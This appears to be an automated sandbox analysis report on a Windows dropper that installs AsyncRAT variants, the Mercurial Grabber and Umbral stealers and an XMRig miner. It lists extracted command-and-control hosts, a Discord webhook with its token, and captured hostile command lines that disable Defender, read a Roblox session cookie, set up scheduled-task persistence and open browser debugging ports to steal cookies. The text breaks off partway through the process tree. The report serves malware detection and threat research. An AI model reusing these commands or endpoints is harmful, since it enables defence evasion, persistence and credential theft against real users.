Overview

overview

10

Static

static

3

4363463463...63.exe

windows11-21h2-x64

10

New Text D...od.exe

windows11-21h2-x64

New Text D...od.exe

windows11-21h2-x64

Analysis

  • max time kernel
    85s
  • max time network
    114s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-11-2024 00:39

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    New Text Document mod.exe

  • Size

    8KB

  • MD5

    69994ff2f00eeca9335ccd502198e05b

  • SHA1

    b13a15a5bea65b711b835ce8eccd2a699a99cead

  • SHA256

    2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

  • SHA512

    ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

  • SSDEEP

    96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Score
10/10
asyncratmercurialgrabberumbralxmrigdefaultcollectioncredential_accessdiscoveryevasionexecutionminerratspywarestealerupx

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

technical-southwest.gl.at.ply.gg:58694

forums-appliances.gl.at.ply.gg:1962
Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain
aes.plain

Extracted

Family

mercurialgrabber

C2

https://discordapp.com/api/webhooks/1308883657456619530/0_Ad9EyrLZrIMKH4vjM6XHyvCJJtKddsiohDSyvCWZ8HIxpyNxmVJgrKb_zO-jqSHSO0

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

3.70.228.168:555

Mutex

bslxturcmlpmyqrv

Attributes
  • delay

    1

  • install

    true

  • install_file

    atat.exe

  • install_folder

    %AppData%

aes.plain
aes.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

66.66.146.74:9511

Mutex

nwJFeGdDXcL2

Attributes
  • delay

    3

  • install

    true

  • install_file

    System32.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

3.70.228.168:555

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Detect Umbral payload 2 IoCs
  • Mercurial Grabber Stealer

    Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.

    stealermercurialgrabber
  • Mercurialgrabber family
    mercurialgrabber
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Async RAT payload 5 IoCs
    rat
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
    evasion
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
    evasion
  • XMRig Miner payload 1 IoCs
    miner
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
    evasion
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 5 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 30 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 1 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
    evasion
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3276
      • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
        "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3512
        • C:\Users\Admin\AppData\Local\Temp\a\Loader.exe
          "C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:4548
        • C:\Users\Admin\AppData\Local\Temp\a\output.exe
          "C:\Users\Admin\AppData\Local\Temp\a\output.exe"
          3⤵
          • Looks for VirtualBox Guest Additions in registry
          • Looks for VMWare Tools registry key
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Maps connected drives based on registry
          • Checks SCSI registry key(s)
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:2820
        • C:\Users\Admin\AppData\Local\Temp\a\saloader.exe
          "C:\Users\Admin\AppData\Local\Temp\a\saloader.exe"
          3⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3184
          • C:\Windows\SYSTEM32\attrib.exe
            "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\saloader.exe"
            4⤵
            • Views/modifies file attributes
            PID:1728
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\saloader.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4780
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3496
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:4676
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:5028
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" os get Caption
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4564
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" computersystem get totalphysicalmemory
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:668
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            4⤵
              PID:1472
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              4⤵
              • Command and Scripting Interpreter: PowerShell
              PID:4768
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic" path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:3064
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\a\saloader.exe" && pause
              4⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              PID:1664
              • C:\Windows\system32\PING.EXE
                ping localhost
                5⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:4048
          • C:\Users\Admin\AppData\Local\Temp\a\aidans.dont.run.exe
            "C:\Users\Admin\AppData\Local\Temp\a\aidans.dont.run.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3996
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "windows" /tr '"C:\Users\Admin\AppData\Roaming\windows.exe"' & exit
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4288
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "windows" /tr '"C:\Users\Admin\AppData\Roaming\windows.exe"'
                5⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3168
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDE2B.tmp.bat""
              4⤵
                PID:2512
                • C:\Windows\system32\timeout.exe
                  timeout 3
                  5⤵
                  • Delays execution with timeout.exe
                  PID:4112
                • C:\Users\Admin\AppData\Roaming\windows.exe
                  "C:\Users\Admin\AppData\Roaming\windows.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:2624
            • C:\Users\Admin\AppData\Local\Temp\a\handeltest.exe
              "C:\Users\Admin\AppData\Local\Temp\a\handeltest.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4684
            • C:\Users\Admin\AppData\Local\Temp\a\xs.exe
              "C:\Users\Admin\AppData\Local\Temp\a\xs.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:592
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "aspnet_regbrowsers" /tr '"C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe"' & exit
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2340
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "aspnet_regbrowsers" /tr '"C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe"'
                  5⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:2620
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDA81.tmp.bat""
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3348
                • C:\Windows\system32\timeout.exe
                  timeout 3
                  5⤵
                  • Delays execution with timeout.exe
                  PID:1800
                • C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe
                  "C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:1964
            • C:\Users\Admin\AppData\Local\Temp\a\Tutorial.exe
              "C:\Users\Admin\AppData\Local\Temp\a\Tutorial.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3872
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:5084
            • C:\Users\Admin\AppData\Local\Temp\a\aa.exe
              "C:\Users\Admin\AppData\Local\Temp\a\aa.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2104
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "atat" /tr '"C:\Users\Admin\AppData\Roaming\atat.exe"' & exit
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1988
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "atat" /tr '"C:\Users\Admin\AppData\Roaming\atat.exe"'
                  5⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:3424
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD90A.tmp.bat""
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2088
                • C:\Windows\system32\timeout.exe
                  timeout 3
                  5⤵
                  • Delays execution with timeout.exe
                  PID:1944
                • C:\Users\Admin\AppData\Roaming\atat.exe
                  "C:\Users\Admin\AppData\Roaming\atat.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:2836
            • C:\Users\Admin\AppData\Local\Temp\a\nobody.exe
              "C:\Users\Admin\AppData\Local\Temp\a\nobody.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:884
            • C:\Users\Admin\AppData\Local\Temp\a\ataturk.exe
              "C:\Users\Admin\AppData\Local\Temp\a\ataturk.exe"
              3⤵
              • Executes dropped EXE
              PID:1476
            • C:\Users\Admin\AppData\Local\Temp\a\start.exe
              "C:\Users\Admin\AppData\Local\Temp\a\start.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:2636
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System32" /tr '"C:\Users\Admin\AppData\Roaming\System32.exe"' & exit
                4⤵
                • System Location Discovery: System Language Discovery
                PID:5092
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "System32" /tr '"C:\Users\Admin\AppData\Roaming\System32.exe"'
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:4896
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE3A9.tmp.bat""
                4⤵
                • System Location Discovery: System Language Discovery
                PID:4780
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 3
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Delays execution with timeout.exe
                  PID:4720
                • C:\Users\Admin\AppData\Roaming\System32.exe
                  "C:\Users\Admin\AppData\Roaming\System32.exe"
                  5⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2044
            • C:\Users\Admin\AppData\Local\Temp\a\Winsvc.exe
              "C:\Users\Admin\AppData\Local\Temp\a\Winsvc.exe"
              3⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Drops startup file
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:4868
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                4⤵
                  PID:3560
              • C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe
                "C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe"
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                PID:1044
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  4⤵
                  • Uses browser remote debugging
                  • Drops file in Windows directory
                  • Enumerates system info in registry
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of FindShellTrayWindow
                  PID:2600
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff6ff6cc40,0x7fff6ff6cc4c,0x7fff6ff6cc58
                    5⤵
                      PID:2944
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2260,i,1218905446483699927,17110078985567425389,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2256 /prefetch:2
                      5⤵
                        PID:536
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1728,i,1218905446483699927,17110078985567425389,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2348 /prefetch:3
                        5⤵
                          PID:1172
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1884,i,1218905446483699927,17110078985567425389,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2468 /prefetch:8
                          5⤵
                            PID:5088
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3132,i,1218905446483699927,17110078985567425389,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1
                            5⤵
                            • Uses browser remote debugging
                            PID:4512
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,1218905446483699927,17110078985567425389,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3216 /prefetch:1
                            5⤵
                            • Uses browser remote debugging
                            PID:3312
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4488,i,1218905446483699927,17110078985567425389,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4544 /prefetch:1
                            5⤵
                            • Uses browser remote debugging
                            PID:644
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4184,i,1218905446483699927,17110078985567425389,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4712 /prefetch:8
                            5⤵
                              PID:1632
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                            4⤵
                            • Uses browser remote debugging
                            PID:7132
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff59a03cb8,0x7fff59a03cc8,0x7fff59a03cd8
                              5⤵
                                PID:2876
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,4150380073474022786,5735670466143930999,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1864 /prefetch:2
                                5⤵
                                  PID:6472
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1852,4150380073474022786,5735670466143930999,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
                                  5⤵
                                    PID:6920
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1852,4150380073474022786,5735670466143930999,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2508 /prefetch:8
                                    5⤵
                                      PID:6532
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1852,4150380073474022786,5735670466143930999,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
                                      5⤵
                                      • Uses browser remote debugging
                                      PID:5916
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1852,4150380073474022786,5735670466143930999,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
                                      5⤵
                                      • Uses browser remote debugging
                                      PID:6352
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,4150380073474022786,5735670466143930999,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1856 /prefetch:2
                                      5⤵
                                        PID:7004
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,4150380073474022786,5735670466143930999,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2832 /prefetch:2
                                        5⤵
                                          PID:6128
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1852,4150380073474022786,5735670466143930999,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4492 /prefetch:1
                                          5⤵
                                          • Uses browser remote debugging
                                          PID:6296
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1852,4150380073474022786,5735670466143930999,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4456 /prefetch:1
                                          5⤵
                                          • Uses browser remote debugging
                                          PID:6852
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
